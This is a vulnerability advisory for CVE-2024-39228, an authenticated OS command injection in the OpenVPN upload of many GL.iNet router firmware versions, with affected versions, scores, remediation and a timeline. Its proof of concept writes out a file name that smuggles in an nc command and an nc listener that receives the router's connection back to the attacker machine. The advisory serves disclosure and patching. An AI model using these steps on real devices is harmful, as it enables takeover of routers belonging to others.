OS Command Injection in Various GL.INet Devices

CVE ID	CVE-2024-39228
CVE Link	https://nvd.nist.gov/vuln/detail/CVE-2024-39228
Vendor	GL.iNet
Affected Product & Version	MT6000: 4.5.8 A1300/X300B: 4.5.16 AX1800/AXT1800/MT2500/MT3000: 4.5.16 X3000/XE3000: 4.4.8 XE300: 4.3.16 E750: 4.3.12 X750/SFT1200/AR300M/AR300M16/AR750/AR750S/B1300/MT1300/MT300N-V2 AP1300: 3.217 B2200/MV1000/MV1000W/USB150/SF1200/N300/S1300: 3.216
Vulnerability Type	CWE-78: Improper Neutralization of Special Elements used in an OS command (‘OS Command Injection’)
CVSS Base Score / CVSS Vector	NVD: 9.8 Critical / CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H BDO: 8.8 High / CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Author	Manfred Heinz
Date	2024-08-06

CVE Details

Description:

Due to a an improper neutralization of special elements used in an OS command inside the OpenVPN and WireGuard APIs of the GL-iNet firmware, an authenticated attacker can inject and execute arbitrary shell commands by uploading client configuration archives that contain files with specifically crafted file names.

The web application component ovpn-client.so is vulnerable to authenticated remote code execution in the check_ovpn_client_config and in the check_config functions. Shell commands can be injected as part of the filename of the ovpn-client configuration file which is part of an archive which can then be uploaded to the web application. The application does not validate the archived configuration files when executing the function check_ovpn_client_config(). Filenames with the extension .ovpn, .txt, .crt or .conf are embedded in a system call so that shell commands embedded in the filename are executed. For an exploit, archives with the extensions .tar, .gz or .zip can be used.

By invoking the interface for ovpn, arbitrary shell commands can be executed to manipulate the router or to gain access to the routers OS. As a proof of concept the following steps can be performed:

1. Create a configuration file with a shell command in the filename: touch '$(nc 192.168.8.178 4444).txt'

2. Use the previously created configuration file to create, for example, a tar archive: tar -cvf rce.tar '$(nc 192.168.8.178 4444).txt'

3. Start an nc listener on the attacker's machine: nc -lvp 4444

4. Use the upload function of the web application with the ovpn configuration to upload the tar archive file to the web application

5. Then, a connection will be seen returning to the attacker's machine.

Remediation:

Update firmware to the latest available version, at least to (depending on model):
3.2.18, 4.3.17, 4.4.9, 4.5.17, 4.6.2

References:

https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Ovpn interface shell injection.md

Timeline:

2024-05-05: Vulnerability reported to GL-iNet

2024-05-30: Vulnerability was fixed

2024-08-01: GL-iNet published vendor security advisory

2024-08-06: CVE published